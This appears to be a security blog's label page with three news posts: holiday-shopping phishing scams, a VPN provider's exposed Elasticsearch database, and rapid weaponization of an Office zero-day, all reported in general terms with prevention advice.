Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label User Secuirty. Show all posts

Scammers are Targeting Black Friday and Cyber Monday Shoppers

 

As Black Friday and Cyber Monday (BFCM) approach, hackers are plotting new tricks to spoil the party of shoppers. 

Last year, US shoppers spent USD 10.90 billion on Cyber Monday and another USD 9.03 billion on Black Friday. At the same time, merchants also hope to cash in on any additional traffic that BFCM brings to their ecommerce sites. 

But, while more traffic often brings more opportunities, it also directs to increased rates of online fraud. According to the UK's National Cyber Security Centre (NCSC), victims of online shopping frauds lost an average of ($1,176) each during the holiday shopping period last year – and the figure is rising. 

Sophisticated Technique 

To understand the patterns of cyber fraud, threat analysts at Bitdefender Antispam Lab have examined the fraudulent activities associated with Black Friday and Cyber Monday. 

During their study of fraud patterns between October 26 and November 9, the analysts detected that rate of unverified Black Friday emails peaked on Nov 9, when reached 26% of all Black Friday-related mail. The fraudsters employed multiple email subjects in an attempt to lure the recipients into visiting the fake websites to receive huge discounts. 

The researchers also identified a widespread online campaign inviting recipients to claim gift cards from popular retailers like Home Depot. In this case, the malicious emails include links to bogus online survey pages that have nothing to do with the retailer’s gift card. 

Once the victims have completed the survey, they were directed to another page where they could choose the ‘prize.’ To receive the prize at their doorstep, recipients were requested to pay for the shipment by providing private and banking details. 

“We scored an iPhone 13, though. The displayed page uses the recipients’ IP address to display a localized version of the scam – in our case Romania. We need to pay 15 RON (roughly 3.06 USD) for shipping and enter our name and address,” one of the recipients of fraud mail stated. “After entering our shipping details, we were prompted to enter our payment information, including cc number and CVV code.” 

Prevention Tips 

  1. Always scan the sender’s email address and look for typos 
  2. Never interact with unsolicited giveaway correspondence 
  3. Always shop on verified websites you already know 
  4. Research properly before providing details to a new vendor 
  5. Avoid accessing links or attachments from unverified sources

One Million Users were Exposed Due to a VPN Provider's Misconfiguration

 

A misconfigured Elasticsearch server exposed the personally identifiable information (PII) of at least one million users of a Chinese-run VPN provider. According to WizCase, the privacy concern impacts Quickfox, a free VPN used mostly by the Chinese diaspora to access sites that are otherwise inaccessible from outside mainland China. Unfortunately, Fuzhou Zixun Network Technology, the owner of Quickfox, had not properly set up its Elastic Stack security, leaving an Elasticsearch server unprotected and accessible — with no password protection or encryption in place. 

Ata Hakcil headed a team of ethical cyber researchers who discovered a serious leak that exposed Quickfox's ElasticSearch server. The leak was caused by a security flaw in the ELK stack. Elasticsearch, Logstash, and Kibana (ELK) are three open-source applications that make searching enormous files easier, such as the logs of an online service like Quickfox. 

Quickfox had put up access controls in Kibana, but they hadn't done the same for their Elasticsearch server. Anyone with a browser and an internet connection might gain access to Quickfox records and extract sensitive information about Quickfox users. 

Around 500 million records totaling over 100GB of data were exposed as a result of the incident. There were primarily two categories of data in the information. The personal information of around 1 million users was the first type. The second type concerned software installed on over 300,000 users' devices. The documents discovered were all dated between June 2021 and September 2021. 

According to the IP addresses discovered in the breach, it mostly affected individuals in the United States, as well as countries bordering China, such as Japan, Indonesia, and Kazakhstan. 

Customers' emails, IP addresses, phone numbers, data to identify device kind, and MD5 hashed passwords were among the PII revealed. MD5 is far from safe, according to WizCase, and can be cracked with modern technology. This would have been enough for criminals to use phishing emails, vishing phone calls, and other methods to obtain further sensitive information such as credit card or bank account numbers.

“The leaked information about device type and installed software could make this con very convincing,” warned WizCase. “It’s unclear why the VPN was collecting this data, as it is unnecessary for its process and it is not standard practice seen with other VPN services.” 

Cyber-criminals could try to hijack other accounts across the web by unmasking MD5 hashed passwords and using credential stuffing tactics, WizCase said. It advised consumers to thoroughly vet VPN providers before selecting one and to be aware that free services may benefit from the collection and use of client data.

Cybercriminals are Exploiting Zero-day Vulnerabilities at a Record Pace

 

The HP Wolf Security threat research team has discovered evidence that threat actors are mobilizing quickly to weaponize new zero-day vulnerabilities. 

According to HP Wolf Security Threat Insights Report, the attackers are abusing specific problems like CVE-2021-40444 -- the remote code execution flaw that enables exploitation of the MSHTML browser engine through Microsoft Office documents. The vulnerability was first identified by HP on September 8, a week before Microsoft released the patch.

By September 10, the HP threat research team detected scripts designed to automate the creation of this exploit being published it on GitHub. The exploit gives attackers a startlingly easy entry point into systems, deploying malware through an Office document that only needs very little user interaction.

The security researchers compile the report by examining the millions of endpoints running HP Wolf Security. The report shows that 12% of isolated email malware evaded at least one gateway scanner while 89% of malware spotted was delivered via email. Also, the web downloads were responsible for 11%, and other vectors like removable storage devices for less than 1%. 

The average time for a company to apply, test, and fully deploy patches with the proper checks is 97 days, giving threat actors an opportunity to exploit this 'window of vulnerability', explained Alex Holland, the senior malware analyst with the HP Wolf Security threat research team. 

"While only highly capable hackers could exploit this vulnerability at first, automated scripts have lowered the bar for entry, making this type of attack accessible to less¬ knowledgeable and resourced threat actors. This increases the risk to businesses substantially, as zero-day exploits are commoditized and made available to the mass market in venues like underground forums," Holland said. 

"Such novel exploits tend to be effective at evading detection tools because signatures may be imperfect and become obsolete quickly as the understanding of the scope of an exploit change. We expect threat actors to adopt CVE-2021-40444 as part of their arsenals, and potentially even replace common exploits used to gain initial access to systems today, such as those exploiting Equation Editor."

Unfortunately, some major platforms like OneDrive are allowing attackers to conduct 'flash in the pan' attacks. Although malware hosted on such platforms is generally taken down quickly, this does not deter attackers because they can often secure their goal of deploying malware in the few hours the links are live, Holland explained.

"Some threat actors are changing the script or file type they are using every few months. Malicious JavaScript and HTA files are nothing new, but they are still landing in employee inboxes, putting the enterprise at risk. One campaign deployed Vengeance Justice Worm, which can spread to other systems and USB drives," Holland added. 

Additionally, the researchers discovered threat actors exploiting Cloud and web providers to install malware as well as multiple malware families being hosted on Discord and other gaming social media platforms. 

With cyber-assaults increasing with each passing day, Dr. Ian Pratt, Global Head of Security for Personal Systems, HP Inc. believes that companies can’t keep relying on detection alone. He believes the threat landscape is too dynamic and, as highlighted in the analysis of threats captured, attackers are increasingly evolving to bypass any detection tool.

"Organizations must take a layered approach to endpoint security, following zero trust principles to contain and isolate the most common attack vectors like email, browsers, and downloads. This will eliminate the attack surface for whole classes of threats while giving organizations the breathing room needed to coordinate patch cycles securely without disrupting services," Pratt said.